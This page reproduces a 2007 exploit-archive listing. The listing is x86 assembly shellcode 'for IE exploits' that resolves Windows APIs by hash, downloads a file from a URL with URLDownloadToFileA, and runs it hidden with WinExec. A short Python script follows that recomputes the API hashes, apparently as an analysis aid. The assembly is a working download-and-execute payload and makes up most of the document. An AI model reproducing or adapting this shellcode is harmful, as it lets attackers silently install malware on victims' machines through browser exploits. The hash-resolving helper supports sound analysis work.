Download Example
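An example of downloading a file from the internet. The program cannot run on its own; it must run inside a process in which URLMON.dll is already loaded. The author says it is intended for IE injection.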
```asm
;
; relocateable dynamic runtime assembly code example using hash lookup *** for IE exploits only ***
; the URLMON.DLL must already be loaded into the process space for this to work, so do not run on its own!!
;
; to test use /DTEST_CODE in ml command line
;
; URLDownLoadToFileA() / WinExec() / ExitProcess() | ExitThread()
;
; 124 bytes
;
; for testing:
;
; ml /c /coff /Cp /DTEST_CODE dexec32.asm
; link /subsystem:windows /section:.text,w dexec32.obj urlmon.lib
;
; wyse101 [at] gmail.com
;
; March 2007
;
.386
.model flat,stdcall

ROL_CONSTANT equ 5

; int mrol(int iNum, int iBits)
; {return (iNum << iBits) | (iNum >> (32 - iBits));}
mrol macro iNum:req,iBits:req
    exitm <(iNum shl iBits) or (iNum shr (32-iBits))>
endm

mror macro iNum:req,iBits:req
    exitm <(iNum shr iBits) or (iNum shl (32-iBits))>
endm

hashapi macro szApi
    local dwApi
    dwApi = 0
    forc x,szApi
        dwApi = dwApi + '&x'
        dwApi = mrol(dwApi,ROL_CONSTANT)
    endm
    dwApi = mrol(dwApi,ROL_CONSTANT)
    dw (dwApi and 0ffffh)
endm

.code
    assume fs:nothing

code_start:
    jmp load_data
IFDEF TEST_CODE
extern URLDownloadToFileA :proc
    call URLDownloadToFileA               ; included when assembled with /DTEST_CODE
ENDIF
setup_parameters:
    pop edi                               ; offset @cmd_start
    xor eax,eax                           ; eax = 0
    cdq                                   ; edx = 0
    ; ********************************************************************
    push eax                              ; exit code = 0
    ; ********************************************************************
    push eax                              ; SW_HIDE
    mov dl,(@cmd_end-@cmd_start)-1        ; this allows command up to 255 bytes
    push edi                              ; file name to execute
    ; ********************************************************************
    push eax                              ; callback routine URLDownLoadToFileA
    push eax                              ; reserved, must be zero
    push edi                              ; file name to save as
    add edi,edx                           ; get offset of @url_start-1
    stosb                                 ; zero tail end
    mov dl,(@url_end-@url_start)-1        ; limit of 255 bytes for url
    push edi                              ; url to download file from
    push eax                              ; interface
    add edi,edx                           ; get offset of @url_end-1
    stosb                                 ; zero tail end of url
    ; *********************************************************************
load_modules:
    push edi                              ; save current offset to hashes
    push 30h
    pop ecx
    mov eax,fs:[ecx]                      ; PEB base address
    mov eax,[eax+0ch]                     ; PEB_LDR_DATA LoaderData
    mov ebp,[eax+1ch]                     ; LIST_ENTRY InInitializationOrderModuleList
scan_dll:
    mov ebx,[ebp+8]                       ; DllBase
    mov ebp,[ebp]                         ; Flink
    push ebp                              ; save
    mov eax,[ebx+3ch]
    mov eax,[ebx+eax+78h]                 ; IMAGE_DIRECTORY_ENTRY_EXPORT
    lea esi,[ebx+eax+18h]                 ; offset IMAGE_EXPORT_DIRECTORY.NumberOfNames
    lodsd
    xchg eax,ecx                          ; ecx = NumberOfNames
    lodsd
    add eax,ebx                           ; AddressOfFunctions
    push eax
    lodsd
    lea edi,[eax+ebx]                     ; AddressOfNames
    lodsd
    lea ebp,[eax+ebx]                     ; ebp = AddressOfNameOrdinals
load_api:
    mov esi,[edi+4*ecx-4]
    add esi,ebx
    xor eax,eax
    cdq
hash_api:
    lodsb
    add edx,eax
    rol edx,ROL_CONSTANT
    dec eax
    jns hash_api
    mov esi,[esp+8]                       ; get api hashes
    cmp dx,word ptr[esi]                  ; found a match?
    je call_api
    loop load_api
    pop eax                               ; check
    pop ebp                               ;
    jmp scan_dll
call_api:
    pop eax
    movzx edx,word ptr [ebp+2*ecx-2]
    add ebx,[eax+4*edx]
    pop ebp                               ; modules
    pop edi                               ; api hashes
    call ebx                              ; call api
    stosw                                 ; advance 2 bytes to next hash
    jmp load_modules                      ; do another, just keep going until ExitProcess is reached.
    ; *************************
load_data:
    call setup_parameters
@cmd_start:
    db 'file.exe',0ffh                    ; WinExec("file.exe",SW_HIDE);
@cmd_end:
@url_start:
    db 'http://127.0.0.1/file.exe',0ffh   ; url of file to download
@url_end:
    hashapi <URLDownloadToFileA>
    hashapi <WinExec>
    hashapi <ExitProcess>
    ; *********************************************************************
end code_start

; milw0rm.com [2007-06-14]
```
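The `hashapi` macro and the `hash_api` loop in the listing compute the same 16-bit rotate-and-add hash of an export name. As an added example (not part of the original listing), this Python helper reimplements that hash so an analyst can map hash words found in such code back to export names; the function names and the export list are constructed for illustration.

```python
ROL_CONSTANT = 5  # same rotate count as ROL_CONSTANT in the listing


def rol32(value, bits):
    """Rotate a 32-bit value left, like the x86 ROL instruction."""
    value &= 0xFFFFFFFF
    return ((value << bits) | (value >> (32 - bits))) & 0xFFFFFFFF


def api_hash(name):
    """16-bit hash of an export name, matching hashapi / hash_api."""
    h = 0
    # The runtime loop also processes the terminating NUL byte: it adds
    # nothing but still rotates once more. The macro's final mrol does the same.
    for byte in name.encode("latin-1") + b"\x00":
        h = rol32(h + byte, ROL_CONSTANT)
    return h & 0xFFFF  # the listing compares only DX, the low 16 bits


def build_lookup(export_names):
    """Map hash -> sorted names. Only 16 bits are kept, so several names
    can share one hash; every candidate is retained for the analyst."""
    table = {}
    for name in export_names:
        table.setdefault(api_hash(name), []).append(name)
    return {h: sorted(names) for h, names in table.items()}


def annotate(hash_words, export_names):
    """Resolve hash words taken from a sample against known export names.
    Unresolved words come back with an empty candidate list."""
    table = build_lookup(export_names)
    return [(word, table.get(word, [])) for word in hash_words]


# Constructed input: a small subset of export names. In practice this list
# would come from the export tables of the DLLs loaded in the process.
SAMPLE_EXPORTS = [
    "URLDownloadToFileA", "WinExec", "ExitProcess",
    "ExitThread", "CreateFileA", "LoadLibraryA",
]

if __name__ == "__main__":
    # Stand-in for the three words emitted by the hashapi lines in the listing.
    words = [api_hash(n) for n in ("URLDownloadToFileA", "WinExec", "ExitProcess")]
    for word, names in annotate(words, SAMPLE_EXPORTS):
        print(f"{word:#06x} -> {names or 'unknown'}")
```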